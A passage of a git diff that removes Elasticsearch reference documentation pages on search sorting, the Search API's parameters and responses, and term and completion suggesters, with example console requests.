or equal if the value -is negative) to the argument and is equal to a mathematical integer. - -This option can also be used to convert a `date` field that uses millisecond -resolution to a `date_nanos` field with nanosecond resolution. -Consider for instance these two indices: - -[source,console] --------------------------------------------------- -PUT /index_double -{ - "mappings": { - "properties": { - "field": { "type": "date" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -PUT /index_long -{ - "mappings": { - "properties": { - "field": { "type": "date_nanos" } - } - } -} --------------------------------------------------- -// TEST[continued] - -Values in these indices are stored with different resolutions so sorting on these -fields will always sort the `date` before the `date_nanos` (ascending order). 
-With the `numeric_type` type option it is possible to set a single resolution for -the sort, setting to `date` will convert the `date_nanos` to the millisecond resolution -while `date_nanos` will convert the values in the `date` field to the nanoseconds resolution: - -[source,console] --------------------------------------------------- -POST /index_long,index_double/_search -{ - "sort" : [ - { - "field" : { - "numeric_type" : "date_nanos" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -[WARNING] -To avoid overflow, the conversion to `date_nanos` cannot be applied on dates before -1970 and after 2262 as nanoseconds are represented as longs. - -[discrete] -[[nested-sorting]] -=== Sorting within nested objects. - -Elasticsearch also supports sorting by -fields that are inside one or more nested objects. The sorting by nested -field support has a `nested` sort option with the following properties: - -`path`:: - Defines on which nested object to sort. The actual - sort field must be a direct field inside this nested object. - When sorting by nested field, this field is mandatory. - -`filter`:: - A filter that the inner objects inside the nested path - should match with in order for its field values to be taken into account - by sorting. Common case is to repeat the query / filter inside the - nested filter or query. By default no `nested_filter` is active. -`max_children`:: - The maximum number of children to consider per root document - when picking the sort value. Defaults to unlimited. -`nested`:: - Same as top-level `nested` but applies to another nested path within the - current nested object. - -[WARNING] -.Nested sort options before Elasticsearch 6.1 -============================================ - -The `nested_path` and `nested_filter` options have been deprecated in -favor of the options documented above. - -============================================ - -[discrete] -==== Nested sorting examples - -In the below example `offer` is a field of type `nested`. -The nested `path` needs to be specified; otherwise, Elasticsearch doesn't know on what nested level sort values need to be captured. - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "term" : { "product" : "chocolate" } - }, - "sort" : [ - { - "offer.price" : { - "mode" : "avg", - "order" : "asc", - "nested": { - "path": "offer", - "filter": { - "term" : { "offer.color" : "blue" } - } - } - } - } - ] -} --------------------------------------------------- - -In the below example `parent` and `child` fields are of type `nested`. -The `nested_path` needs to be specified at each level; otherwise, Elasticsearch doesn't know on what nested level sort values need to be captured. - -[source,console] --------------------------------------------------- -POST /_search -{ - "query": { - "nested": { - "path": "parent", - "query": { - "bool": { - "must": {"range": {"parent.age": {"gte": 21}}}, - "filter": { - "nested": { - "path": "parent.child", - "query": {"match": {"parent.child.name": "matt"}} - } - } - } - } - } - }, - "sort" : [ - { - "parent.child.age" : { - "mode" : "min", - "order" : "asc", - "nested": { - "path": "parent", - "filter": { - "range": {"parent.age": {"gte": 21}} - }, - "nested": { - "path": "parent.child", - "filter": { - "match": {"parent.child.name": "matt"} - } - } - } - } - } - ] -} --------------------------------------------------- - -Nested sorting is also supported when sorting by -scripts and sorting by geo distance. 
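
For example, the following sketch sorts hits by the distance to the closest
matching nested offer. It assumes `offer` is a `nested` field and that
`offer.location` (a hypothetical subfield) is mapped as a `geo_point`; the
`nested` option behaves the same way as in the field sorts above.

[source,console]
--------------------------------------------------
POST /_search
{
  "query" : {
    "term" : { "product" : "chocolate" }
  },
  "sort" : [
    {
      "_geo_distance" : {
        "offer.location" : [ -70, 40 ],
        "order" : "asc",
        "unit" : "km",
        "nested" : {
          "path" : "offer",
          "filter" : {
            "term" : { "offer.color" : "blue" }
          }
        }
      }
    }
  ]
}
--------------------------------------------------
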
- -[discrete] -=== Missing Values - -The `missing` parameter specifies how docs which are missing -the sort field should be treated: The `missing` value can be -set to `_last`, `_first`, or a custom value (that -will be used for missing docs as the sort value). -The default is `_last`. - -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { "price" : {"missing" : "_last"} } - ], - "query" : { - "term" : { "product" : "chocolate" } - } -} --------------------------------------------------- - -NOTE: If a nested inner object doesn't match with -the `nested_filter` then a missing value is used. - -[discrete] -=== Ignoring Unmapped Fields - -By default, the search request will fail if there is no mapping -associated with a field. The `unmapped_type` option allows you to ignore -fields that have no mapping and not sort by them. The value of this -parameter is used to determine what sort values to emit. Here is an -example of how it can be used: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { "price" : {"unmapped_type" : "long"} } - ], - "query" : { - "term" : { "product" : "chocolate" } - } -} --------------------------------------------------- - -If any of the indices that are queried doesn't have a mapping for `price` -then Elasticsearch will handle it as if there was a mapping of type -`long`, with all documents in this index having no value for this field. - -[discrete] -[[geo-sorting]] -=== Geo Distance Sorting - -Allow to sort by `_geo_distance`. Here is an example, assuming `pin.location` is a field of type `geo_point`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { - "_geo_distance" : { - "pin.location" : [-70, 40], - "order" : "asc", - "unit" : "km", - "mode" : "min", - "distance_type" : "arc", - "ignore_unmapped": true - } - } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - - - -`distance_type`:: - - How to compute the distance. Can either be `arc` (default), or `plane` (faster, but inaccurate on long distances and close to the poles). - -`mode`:: - - What to do in case a field has several geo points. By default, the shortest - distance is taken into account when sorting in ascending order and the - longest distance when sorting in descending order. Supported values are - `min`, `max`, `median` and `avg`. - -`unit`:: - - The unit to use when computing sort values. The default is `m` (meters). - - -`ignore_unmapped`:: - - Indicates if the unmapped field should be treated as a missing value. Setting it to `true` is equivalent to specifying - an `unmapped_type` in the field sort. The default is `false` (unmapped field cause the search to fail). - -NOTE: geo distance sorting does not support configurable missing values: the -distance will always be considered equal to +Infinity+ when a document does not -have values for the field that is used for distance computation. 
- -The following formats are supported in providing the coordinates: - -[discrete] -==== Lat Lon as Properties - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort" : [ - { - "_geo_distance" : { - "pin.location" : { - "lat" : 40, - "lon" : -70 - }, - "order" : "asc", - "unit" : "km" - } - } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Lat Lon as String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": "40,-70", - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Geohash - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": "drm3btev3e86", - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -==== Lat Lon as Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": [ -70, 40 ], - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -[discrete] -=== Multiple reference points - -Multiple geo points can be passed as an array containing any `geo_point` format, for example - -[source,console] --------------------------------------------------- -GET /_search -{ - "sort": [ - { - "_geo_distance": { - "pin.location": [ [ -70, 40 ], [ -71, 42 ] ], - "order": "asc", - "unit": "km" - } - } - ], - "query": { - "term": { "user": "kimchy" } - } -} --------------------------------------------------- - -and so forth. - -The final distance for a document will then be `min`/`max`/`avg` (defined via `mode`) distance of all points contained in the document to all points given in the sort request. - - -[discrete] -=== Script Based Sorting - -Allow to sort based on custom scripts, here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "term": { "user": "kimchy" } - }, - "sort": { - "_script": { - "type": "number", - "script": { - "lang": "painless", - "source": "doc['field_name'].value * params.factor", - "params": { - "factor": 1.1 - } - }, - "order": "asc" - } - } -} --------------------------------------------------- - -[discrete] -=== Track Scores - -When sorting on a field, scores are not computed. By setting -`track_scores` to true, scores will still be computed and tracked. - -[source,console] --------------------------------------------------- -GET /_search -{ - "track_scores": true, - "sort" : [ - { "post_date" : {"order" : "desc"} }, - { "name" : "desc" }, - { "age" : "desc" } - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -[discrete] -=== Memory Considerations - -When sorting, the relevant sorted field values are loaded into memory. -This means that per shard, there should be enough memory to contain -them. For string based types, the field sorted on should not be analyzed -/ tokenized. 
For numeric types, if possible, it is recommended to -explicitly set the type to narrower types (like `short`, `integer` and -`float`). diff --git a/docs/reference/search/search.asciidoc b/docs/reference/search/search.asciidoc deleted file mode 100644 index 853b6f57582..00000000000 --- a/docs/reference/search/search.asciidoc +++ /dev/null @@ -1,720 +0,0 @@ -[[search-search]] -=== Search API -++++ -Search -++++ - -Returns search hits that match the query defined in the request. - -[source,console] ----- -GET /my-index-000001/_search ----- -// TEST[setup:my_index] - -[[search-search-api-request]] -==== {api-request-title} - -`GET //_search` - -`GET /_search` - -`POST //_search` - -`POST /_search` - -[[search-search-api-desc]] -==== {api-description-title} - -Allows you to execute a search query and get back search hits that match the -query. You can provide search queries using the <> or <>. - -[[search-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[role="child_attributes"] -[[search-search-api-query-params]] -==== {api-query-parms-title} - -IMPORTANT: Several options for this API can be specified using a query parameter -or a request body parameter. If both parameters are specified, only the query -parameter is used. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -[[search-partial-responses]] -`allow_partial_search_results`:: -(Optional, Boolean) -If `true`, returns partial results if there are request timeouts or -<>. If `false`, returns an error with -no partial results. Defaults to `true`. -+ -To override the default for this field, set the -`search.default_allow_partial_results` cluster setting to `false`. - -`batched_reduce_size`:: -(Optional, integer) The number of shard results that should be reduced at once -on the coordinating node. This value should be used as a protection mechanism -to reduce the memory overhead per search request if the potential number of -shards in the request can be large. Defaults to `512`. - -[[ccs-minimize-roundtrips]] -`ccs_minimize_roundtrips`:: -(Optional, Boolean) If `true`, network round-trips between the -coordinating node and the remote clusters are minimized when executing -{ccs} (CCS) requests. See <>. Defaults to `true`. - -`docvalue_fields`:: -(Optional, string) A comma-separated list of fields to return as the docvalue -representation of a field for each hit. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`explain`:: -(Optional, Boolean) If `true`, returns detailed information about score -computation as part of a hit. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`ignore_throttled`:: -(Optional, Boolean) If `true`, concrete, expanded or aliased indices will be -ignored when frozen. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_concurrent_shard_requests`:: -(Optional, integer) Defines the number of concurrent shard requests per node -this search executes concurrently. 
This value should be used to limit the -impact of the search on the cluster in order to limit the number of concurrent -shard requests. Defaults to `5`. - -`pre_filter_shard_size`:: -(Optional, integer) Defines a threshold that enforces a pre-filter roundtrip -to prefilter search shards based on query rewriting if the number of shards -the search request expands to exceeds the threshold. This filter roundtrip can -limit the number of shards significantly if for instance a shard can not match -any documents based on its rewrite method ie. if date filters are mandatory -to match but the shard bounds and the query are disjoint. -When unspecified, the pre-filter phase is executed if any of these conditions is met: - - The request targets more than `128` shards. - - The request targets one or more read-only index. - - The primary sort of the query targets an indexed field. - -[[search-preference]] -`preference`:: -(Optional, string) -Nodes and shards used for the search. By default, {es} selects from eligible -nodes and shards using <>, -accounting for <>. -+ -.Valid values for `preference` -[%collapsible%open] -==== -`_only_local`:: -Run the search only on shards on the local node. - -`_local`:: -If possible, run the search on shards on the local node. If not, select shards -using the default method. - -`_only_nodes:,`:: -Run the search on only the specified nodes IDs. If suitable shards exist on more -than one selected nodes, use shards on those nodes using the default method. If -none of the specified nodes are available, select shards from any available node -using the default method. - -`_prefer_nodes:,`:: -If possible, run the search on the specified nodes IDs. If not, select shards -using the default method. - -`_shards:,`:: -Run the search only on the specified shards. This value can be combined with -other `preference` values, but this value must come first. For example: -`_shards:2,3|_local` - -:: -Any string that does not start with `_`. If the cluster state and selected -shards do not change, searches using the same `` value are routed -to the same shards in the same order. -==== - - -[[search-api-query-params-q]] -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] -+ -You can use the `q` parameter to run a query parameter search. Query parameter -searches do not support the full {es} <> but are handy for -testing. -+ -IMPORTANT: The `q` parameter overrides the <> -parameter in the request body. If both parameters are specified, documents -matching the `query` request body parameter are not returned. - -`request_cache`:: -(Optional, Boolean) If `true`, the caching of search results is enabled for -requests where `size` is `0`. See <>. Defaults to index -level settings. - -`rest_total_hits_as_int`:: -(Optional, Boolean) Indicates whether hits.total should be rendered as an -integer or an object in the rest search response. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -[[search-api-scroll-query-param]] -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. - -[[search-type]] -`search_type`:: -(Optional, string) -How {wikipedia}/Tf–idf[distributed term frequencies] are calculated for -<>. 
-+ -.Valid values for `search_type` -[%collapsible%open] -==== -`query_then_fetch`:: -(Default) -Distributed term frequencies are calculated locally for each shard running the -search. We recommend this option for faster searches with potentially less -accurate scoring. - -[[dfs-query-then-fetch]] -`dfs_query_then_fetch`:: -Distributed term frequencies are calculated globally, using information gathered -from all shards running the search. While this option increases the accuracy of -scoring, it adds a round-trip to each shard, which can result in slower -searches. -==== - -`seq_no_primary_term`:: -(Optional, Boolean) If `true`, returns sequence number and primary term of the -last modification of each hit. See <>. - -`size`:: -(Optional, integer) Defines the number of hits to return. Defaults to `10`. -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`sort`:: -(Optional, string) A comma-separated list of : pairs. - -`_source`:: -(Optional) -Indicates which <> are returned for matching -documents. These fields are returned in the `hits._source` property of -the search response. Defaults to `true`. -+ -.Valid values for `_source` -[%collapsible%open] -==== -`true`:: -(Boolean) -The entire document source is returned. - -`false`:: -(Boolean) -The document source is not returned. - -``:: -(string) -Comma-separated list of source fields to return. -Wildcard (`*`) patterns are supported. -==== - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -`stats`:: -(Optional, string) Specific `tag` of the request for logging and statistical -purposes. - -`stored_fields`:: -(Optional, string) A comma-separated list of stored fields to return as part -of a hit. If no fields are specified, no stored fields are included in the -response. -+ -If this field is specified, the `_source` parameter defaults to `false`. You can -pass `_source: true` to return both source fields and -stored fields in the search response. - -`suggest_field`:: -(Optional, string) Specifies which field to use for suggestions. - -`suggest_text`:: -(Optional, string) The source text for which the suggestions should be -returned. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] -+ -Defaults to `0`, which does not terminate query execution early. - -`timeout`:: -(Optional, <>) Specifies the period of time to wait -for a response. If no response is received before the timeout expires, the -request fails and returns an error. Defaults to no timeout. - -`track_scores`:: -(Optional, Boolean) If `true`, calculate and return document scores, even if -the scores are not used for sorting. Defaults to `false`. - -`track_total_hits`:: -(Optional, integer or Boolean) -Number of hits matching the query to count accurately. Defaults to `10000`. -+ -If `true`, the exact number of hits is returned at the cost of some performance. -If `false`, the response does not include the total number of hits matching the query. - -`typed_keys`:: -(Optional, Boolean) If `true`, aggregation and suggester names are be prefixed -by their respective types in the response. Defaults to `true`. - -`version`:: -(Optional, Boolean) -If `true`, returns document version as part of a hit. Defaults to `false`. 
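Several of the query parameters above can be combined on a single request. For illustration only (this sketch is not part of the original page and is not hooked into the snippet tests), a request against the `my-index-000001` index used elsewhere on this page might look like:

[source,console]
----
GET /my-index-000001/_search?q=user.id:kimchy&size=5&sort=@timestamp:desc&_source=false&seq_no_primary_term=true&track_total_hits=true
----

Because `q` is specified here, any `query` in a request body would be ignored, as noted in the `q` parameter description above.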
- -[role="child_attributes"] -[[search-search-api-request-body]] -==== {api-request-body-title} - -[[search-docvalue-fields-param]] -`docvalue_fields`:: -(Optional, array of strings and objects) -Array of wildcard (`*`) patterns. The request returns doc values for field names -matching these patterns in the `hits.fields` property of the response. -+ -You can specify items in the array as a string or object. -See <>. -+ -.Properties of `docvalue_fields` objects -[%collapsible%open] -==== -`field`:: -(Required, string) -Wildcard pattern. The request returns doc values for field names matching this -pattern. - -`format`:: -(Optional, string) -Format in which the doc values are returned. -+ -For <>, you can specify a date <>. For <> fields, you can specify a -https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html[DecimalFormat -pattern]. -+ -For other field data types, this parameter is not supported. -==== - -`fields`:: -(Optional, array of strings and objects) -Array of wildcard (`*`) patterns. The request returns values for field names -matching these patterns in the `hits.fields` property of the response. -+ -You can specify items in the array as a string or object. -See <> for more details. -+ -.Properties of `fields` objects -[%collapsible%open] -==== -`field`:: -(Required, string) -Wildcard pattern. The request returns values for field names matching this pattern. - -`format`:: -(Optional, string) -Format in which the values are returned. -+ -The date fields <> and <> accept a -<>. <> accept either -`geojson` for http://www.geojson.org[GeoJSON] (the default) or `wkt` for -{wikipedia}/Well-known_text_representation_of_geometry[Well Known Text]. -+ -For other field data types, this parameter is not supported. -==== - -[[request-body-search-explain]] -`explain`:: -(Optional, Boolean) If `true`, returns detailed information about score -computation as part of a hit. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`indices_boost`:: -(Optional, array of objects) -Boosts the <> of documents from specified indices. -+ -.Properties of `indices_boost` objects -[%collapsible%open] -==== -`: `:: -(Required, float) -`` is the name of the index or index alias. Wildcard (`*`) expressions -are supported. -+ -`` is the factor by which scores are multiplied. -+ -A boost value greater than `1.0` increases the score. A boost value between -`0` and `1.0` decreases the score. -==== - -[[search-api-min-score]] -`min_score`:: -(Optional, float) -Minimum <> for matching documents. Documents with a -lower `_score` are not included in the search results. - -[[request-body-search-query]] -`query`:: -(Optional, <>) Defines the search definition using the -<>. - -[[request-body-search-seq-no-primary-term]] -`seq_no_primary_term`:: -(Optional, Boolean) If `true`, returns sequence number and primary term of the -last modification of each hit. See <>. - -`size`:: -(Optional, integer) The number of hits to return. Defaults to `10`. -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`_source`:: -(Optional) -Indicates which <> are returned for matching -documents. These fields are returned in the `hits._source` property of -the search response. Defaults to `true`. 
-+ -.Valid values for `_source` -[%collapsible%open] -==== -`true`:: -(Boolean) -The entire document source is returned. - -`false`:: -(Boolean) -The document source is not returned. - -``:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to return. - -``:: -(object) -Object containing a list of source fields to include or exclude. -+ -.Properties for `` -[%collapsible%open] -===== -`excludes`:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to exclude -from the response. -+ -You can also use this property to exclude fields from the subset specified in -`includes` property. - -`includes`:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to return. -+ -If this property is specified, only these source fields are returned. You can -exclude fields from this subset using the `excludes` property. -===== -==== - -[[stats-groups]] -`stats`:: -(Optional, array of strings) -Stats groups to associate with the search. Each group maintains a statistics -aggregation for its associated searches. You can retrieve these stats using the -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] -+ -Defaults to `0`, which does not terminate query execution early. - -`timeout`:: -(Optional, <>) Specifies the period of time to wait -for a response. If no response is received before the timeout expires, the -request fails and returns an error. Defaults to no timeout. - -[[request-body-search-version]] -`version`:: -(Optional, Boolean) -If `true`, returns document version as part of a hit. Defaults to `false`. - - -[role="child_attributes"] -[[search-api-response-body]] -==== {api-response-body-title} - -`_scroll_id`:: -(string) -Identifier for the search and its <>. -+ -You can use this scroll ID with the <> to retrieve the -next batch of search results for the request. See -<>. -+ -This parameter is only returned if the <> is specified in the request. - -`took`:: -+ --- -(integer) -Milliseconds it took {es} to execute the request. - -This value is calculated by measuring the time elapsed -between receipt of a request on the coordinating node -and the time at which the coordinating node is ready to send the response. - -Took time includes: - -* Communication time between the coordinating node and data nodes -* Time the request spends in the `search` <>, - queued for execution -* Actual execution time - -Took time does *not* include: - -* Time needed to send the request to {es} -* Time needed to serialize the JSON response -* Time needed to send the response to a client --- - -`timed_out`:: -(Boolean) -If `true`, -the request timed out before completion; -returned results may be partial or empty. - -`_shards`:: -(object) -Contains a count of shards used for the request. -+ -.Properties of `_shards` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of shards that require querying, -including unallocated shards. - -`successful`:: -(integer) -Number of shards that executed the request successfully. - -`skipped`:: -(integer) -Number of shards that skipped the request because a lightweight check -helped realize that no documents could possibly match on this shard. This -typically happens when a search request includes a range filter and the -shard only has values that fall outside of that range. - -`failed`:: -(integer) -Number of shards that failed to execute the request. 
Note that shards -that are not allocated will be considered neither successful nor failed. -Having `failed+successful` less than `total` is thus an indication that -some of the shards were not allocated. -==== - -`hits`:: -(object) -Contains returned documents and metadata. -+ -.Properties of `hits` -[%collapsible%open] -==== -`total`:: -(object) -Metadata about the number of returned documents. -+ -.Properties of `total` -[%collapsible%open] -===== -`value`:: -(integer) -Total number of returned documents. - -`relation`:: -(string) -Indicates whether the number of returned documents in the `value` -parameter is accurate or a lower bound. -+ -.Values of `relation`: -[%collapsible%open] -====== -`eq`:: Accurate -`gte`:: Lower bound, including returned documents -====== -===== - -`max_score`:: -(float) -Highest returned <>. -+ -This value is `null` for requests that do not sort by `_score`. - -[[search-api-response-body-hits]] -`hits`:: -(array of objects) -Array of returned document objects. -+ -.Properties of `hits` objects -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index containing the returned document. - -`_type`:: -deprecated:[6.0.0, Mapping types are deprecated and will be removed in 8.0. See <>.] -(string) -Mapping type of the returned document. - -`_id`:: -(string) -Unique identifier for the returned document. -This ID is only unique within the returned index. - -[[search-api-response-body-score]] -`_score`:: -(float) -Positive 32-bit floating point number used to determine the relevance of the -returned document. - -[[search-api-response-body-source]] -`_source`:: -(object) -Original JSON body passed for the document at index time. -+ -You can use the `_source` parameter to exclude this property from the response -or specify which source fields to return. - -`fields`:: -+ --- -(object) -Contains field values for the documents. These fields must be specified in the -request using one or more of the following request parameters: - -* <> -* <> -* <> - -This property is returned only if one or more of these parameters are set. --- -+ -.Properties of `fields` -[%collapsible%open] -====== -``:: -(array) -Key is the field name. Value is the value for the field. 
-====== -===== -==== - -[[search-search-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "term": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -The API returns the following response: - -[source,console-result] ----- -{ - "took": 5, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.3862942, - "hits": [ - { - "_index": "my-index-000001", - "_type" : "_doc", - "_id": "0", - "_score": 1.3862942, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "status_code": 200, - "bytes": 1070000 - }, - "version": "1.1" - }, - "source": { - "ip": "127.0.0.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": $body.took/] diff --git a/docs/reference/search/suggesters.asciidoc b/docs/reference/search/suggesters.asciidoc deleted file mode 100644 index b416bf82a3e..00000000000 --- a/docs/reference/search/suggesters.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[search-suggesters]] -=== Suggesters - -Suggests similar looking terms based on a provided text by using a suggester. -Parts of the suggest feature are still under development. - -[source,console] --------------------------------------------------- -POST my-index-000001/_search -{ - "query" : { - "match": { - "message": "tring out Elasticsearch" - } - }, - "suggest" : { - "my-suggestion" : { - "text" : "tring out Elasticsearch", - "term" : { - "field" : "message" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -[[search-suggesters-api-request]] -==== {api-request-title} - -The suggest feature suggests similar looking terms based on a provided text by -using a suggester. The suggest request part is defined alongside the query part -in a `_search` request. If the query part is left out, only suggestions are -returned. - -NOTE: `_suggest` endpoint has been deprecated in favour of using suggest via -`_search` endpoint. In 5.0, the `_search` endpoint has been optimized for -suggest only search requests. - - -[[search-suggesters-api-example]] -==== {api-examples-title} - -Several suggestions can be specified per request. Each suggestion is identified -with an arbitrary name. In the example below two suggestions are requested. Both -`my-suggest-1` and `my-suggest-2` suggestions use the `term` suggester, but have -a different `text`. - -[source,console] --------------------------------------------------- -POST _search -{ - "suggest": { - "my-suggest-1" : { - "text" : "tring out Elasticsearch", - "term" : { - "field" : "message" - } - }, - "my-suggest-2" : { - "text" : "kmichy", - "term" : { - "field" : "user.id" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] -// TEST[s/^/PUT my-index-000001\/_mapping\n{"properties":{"user":{"properties":{"id":{"type":"keyword"}}}}}\n/] - -The below suggest response example includes the suggestion response for -`my-suggest-1` and `my-suggest-2`. Each suggestion part contains -entries. Each entry is effectively a token from the suggest text and -contains the suggestion entry text, the original start offset and length -in the suggest text and if found an arbitrary number of options. 
- -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": ... - "took": 2, - "timed_out": false, - "suggest": { - "my-suggest-1": [ { - "text": "tring", - "offset": 0, - "length": 5, - "options": [ {"text": "trying", "score": 0.8, "freq": 1 } ] - }, { - "text": "out", - "offset": 6, - "length": 3, - "options": [] - }, { - "text": "elasticsearch", - "offset": 10, - "length": 13, - "options": [] - } ], - "my-suggest-2": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] -// TESTRESPONSE[s/"my-suggest-2": \.\.\./"my-suggest-2": "$body.suggest.my-suggest-2"/] - - -Each options array contains an option object that includes the -suggested text, its document frequency and score compared to the suggest -entry text. The meaning of the score depends on the used suggester. The -term suggester's score is based on the edit distance. - -[discrete] -[[global-suggest]] -===== Global suggest text - -To avoid repetition of the suggest text, it is possible to define a -global text. In the example below the suggest text is defined globally -and applies to the `my-suggest-1` and `my-suggest-2` suggestions. - -[source,console] --------------------------------------------------- -POST _search -{ - "suggest": { - "text" : "tring out Elasticsearch", - "my-suggest-1" : { - "term" : { - "field" : "message" - } - }, - "my-suggest-2" : { - "term" : { - "field" : "user" - } - } - } -} --------------------------------------------------- - -The suggest text can in the above example also be specified as -suggestion specific option. The suggest text specified on suggestion -level override the suggest text on the global level. - -include::suggesters/term-suggest.asciidoc[] - -include::suggesters/phrase-suggest.asciidoc[] - -include::suggesters/completion-suggest.asciidoc[] - -include::suggesters/context-suggest.asciidoc[] - -include::suggesters/misc.asciidoc[] diff --git a/docs/reference/search/suggesters/completion-suggest.asciidoc b/docs/reference/search/suggesters/completion-suggest.asciidoc deleted file mode 100644 index e64b7bf99cc..00000000000 --- a/docs/reference/search/suggesters/completion-suggest.asciidoc +++ /dev/null @@ -1,430 +0,0 @@ -[[completion-suggester]] -==== Completion Suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. For more flexible -search-as-you-type searches that do not use suggesters, see the -<>. - -The `completion` suggester provides auto-complete/search-as-you-type -functionality. This is a navigational feature to guide users to -relevant results as they are typing, improving search precision. -It is not meant for spell correction or did-you-mean functionality -like the `term` or `phrase` suggesters. - -Ideally, auto-complete functionality should be as fast as a user -types to provide instant feedback relevant to what a user has already -typed in. Hence, `completion` suggester is optimized for speed. -The suggester uses data structures that enable fast lookups, -but are costly to build and are stored in-memory. - -[[completion-suggester-mapping]] -===== Mapping - -To use this feature, specify a special mapping for this field, -which indexes the field values for fast completions. 
- -[source,console] --------------------------------------------------- -PUT music -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion" - }, - "title": { - "type": "keyword" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -Mapping supports the following parameters: - -[horizontal] -`analyzer`:: - The index analyzer to use, defaults to `simple`. - -`search_analyzer`:: - The search analyzer to use, defaults to value of `analyzer`. - -`preserve_separators`:: - Preserves the separators, defaults to `true`. - If disabled, you could find a field starting with `Foo Fighters`, if you - suggest for `foof`. - -`preserve_position_increments`:: - Enables position increments, defaults to `true`. - If disabled and using stopwords analyzer, you could get a - field starting with `The Beatles`, if you suggest for `b`. *Note*: You - could also achieve this by indexing two inputs, `Beatles` and - `The Beatles`, no need to change a simple analyzer, if you are able to - enrich your data. - -`max_input_length`:: - Limits the length of a single input, defaults to `50` UTF-16 code points. - This limit is only used at index time to reduce the total number of - characters per input string in order to prevent massive inputs from - bloating the underlying datastructure. Most use cases won't be influenced - by the default value since prefix completions seldom grow beyond prefixes longer - than a handful of characters. - -[[indexing]] -===== Indexing - -You index suggestions like any other field. A suggestion is made of an -`input` and an optional `weight` attribute. An `input` is the expected -text to be matched by a suggestion query and the `weight` determines how -the suggestions will be scored. Indexing a suggestion is as follows: - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest" : { - "input": [ "Nevermind", "Nirvana" ], - "weight" : 34 - } -} --------------------------------------------------- -// TEST - -The following parameters are supported: 